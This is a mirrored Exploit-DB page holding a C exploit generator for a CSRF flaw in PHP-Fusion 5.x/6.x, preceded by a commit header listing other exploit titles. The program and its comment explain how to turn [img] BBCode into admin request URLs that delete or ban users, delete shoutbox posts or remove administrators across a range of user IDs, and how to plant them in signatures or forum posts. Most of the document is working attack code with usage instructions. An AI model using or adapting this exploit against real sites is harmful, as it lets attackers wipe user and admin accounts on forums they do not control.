bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/1135.c
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

130 lines
4.2 KiB
C
Executable file
Raw Blame History

/*
ahh I was hoping for some socket code :( /str0ke
Dark Assassins - http://dark-assassins.com/
Visit us on IRC @ irc.tddirc.net #DarkAssassins
PHP-Fusion [img][/img] exploit
Discovered/Coded by Easyex
Using the [img] [/img] codes we can get an administrator to do a function a normal member cannot do.
For example..
[img]/administration/members.php?step=delete&sortby=all&rowstart=0&user_id=1[/img]
This could be in our signature, forum post or in a comment post. When an admin views the page with the malicious code it will automatically load and do the function we selected. In the example it would delete the shout box post with the id 1.
Because we are using the [img] [/img] code it just shows up as an invalid image.
Code usage:
./fusionimg <version> <dir> deluser <start> <end>
./fusionimg <version> <dir> banuser <start> <end>
./fusionimg <version> <dir> delshout <start end>
./fusionimg <version> <dir> deladmin <start end>
<version> is the PHP-Fusion version. enter 6.x or 5.x depending on the version number.
<start> is the start point of user id(s)
<end> is the end point of the user id(s)
So if we had a vulnerable host running PHP Fusion v6.00.106 or below with say 150 users and we wanted to delete them all we would type ./fusionimg 6.x / deluser 1 150 or if we wanted to delete 1 user that had the id: 5 we would type: ./fusionimg 6.x / deluser 5 5
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int usage() {
printf("Usage: ./fusionimg <version> <dir> <option> <start> <end>\n");
printf("Example: ./fusionimg 6.x / deluser 1 500\n");
exit(1);
}
int main (int argc, char *argv[]) {
printf("\n");
printf("PHP-Fusion [img][/img] exploit\n");
printf("Coded by Easyex from the Dark Assassins crew\n\n");
if(argc < 6 )
usage();
int i;
char cmd[512];
char option[512];
char version[512];
FILE *log;
log = fopen("exploit.txt", "w+");
if(log == 0) {
printf("[-] Error opening log file.\n");
exit(-1);;
}
fprintf(log, "PHP-Fusion [img][/img] exploit\n");
fprintf(log, "Discovered/Coded by Easyex\n\n");
if(strcmp(argv[1], "6.x") == 0) {
strncpy(version, "administration/", 512);
}
else if(strcmp(argv[1], "5.x") == 0) {
strncpy(version, "fusion_admin/", 512);
}
else {
printf("[-] Error, Invalid version!\n");
exit(-1);;
}
// There are other options you can do, This is just some of them...
// If you need to find out a users id you can just go to members.php and click on the user you want and the id will show in the url like ?lookup=1
if(strcmp(argv[3], "deluser") == 0) {
strncpy(option, "members.php?step=delete&sortby=all&rowstart=0&user_id=", 512);
fprintf(log, "You have selected to delete %s > %s user(s)\n", argv[4], argv[5]);
}
else if(strcmp(argv[3], "banuser") == 0) {
strncpy(option, "members.php?step=ban&act=on&sortby=all&rowstart=0&user_id=", 512);
fprintf(log, "You have selected to ban %s > %s user(s)\n", argv[4], argv[5]);
}
else if(strcmp(argv[3], "delshout") == 0) {
strncpy(option, "shoutbox.php?action=delete&shout_id=", 512);
fprintf(log, "You have selected to delete %s > %s shoutbox post(s)\n", argv[4], argv[5]);
}
// We can delete any account, But we cant add admin accounts
else if(strcmp(argv[3], "deladmin") == 0) {
strncpy(option, "administrators.php?remove=", 512);
fprintf(log, "You have selected to delete %s > %s administator(s)\n", argv[4], argv[5]);
}
else {
printf("[-] Error, Invalid option!\n");
exit(-1);
}
printf("[+] Generating image codes...\n\n");
fprintf(log, "Add the following lines of code into your signature, forum post or in a comment post:\n\n");
for (i = atoi(argv[4]); i <= atoi(argv[5]); i++) {
sprintf(cmd, "[img]%s%s%s%d[/img]", argv[2], version, option, i);
fprintf(log, "%s\n", cmd);
}
printf("[+] Completed & logged to exploit.txt\n");
exit(1);
}
// milw0rm.com [2005-08-05]
Reference in a new issue View git blame Copy permalink